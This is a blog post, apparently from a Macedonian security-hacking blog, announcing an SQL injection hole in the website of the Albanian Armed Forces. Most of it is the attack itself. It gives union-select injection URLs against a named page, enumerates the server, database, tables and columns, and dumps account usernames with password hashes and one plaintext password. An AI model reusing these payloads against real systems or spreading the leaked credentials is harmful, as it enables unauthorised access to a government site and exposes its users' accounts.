Sunday, February 13, 2011

gs.mil.al (Army Forces of Albania) SQL INJECTION VULNERABILITY

0
in














POC:
http://www.gs.mil.al/galeri_info.php?idr=&ida=-1+union+select+1,2,3,@@version,5,6--

http://www.gs.mil.al/galeri_info.php?idr=&ida=-1+union+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables+where%20table_schema=database()--

http://www.gs.mil.al/galeri_info.php?idr=&ida=-1+union+select+1,2,3,group_concat(Username,0x3a,Password),5,6+from+editor--

Host Information

Server = Apache/2.2.17 (EL)
Version = 5.1.52
Powered by = PHP/5.2.16
Attack Type = SQL Union Injection
Current User = gs-site-2007@localhost
Current Database = gs
Supports Union = yes
Union Columns = 6

Url| http://www.gs.mil.al/galeri_info.php?idr=&ida=1

Vuln: http://www.gs.mil.al/galeri_info.php?idr=&ida=1+and+1=0+ Union Select 1 ,2,3, UNHEX(HEX([visible])) ,5,6

Comment: --

Visible Column: 4

Hexed: True

Cookie:

Keyword:

Param:

Database:gs

information_schema
gs
test

Tables:editor
dokumente
downloadcat
editor
gallery
gallery_tema
gjera
gjuha
kontakte
kontakteweb
links
materiali
materiali_orig
menu_tree
nivelrubrike
rubrika

Columns: Table editor
EmriEditor
MbiemriEditor
EmailEditor
Username
Password
Aktive
Niveli
Rezerve

admin:c458ac81e291707ec50c8b9c362cdd63,
editor:fe01ce2a7fbac8fafaed7c982a04e229:demo
quark:fe01ce2a7fbac8fafaed7c982a04e229:demo

0 comments:

Post a Comment

About Me

My photo
Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4

 
Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting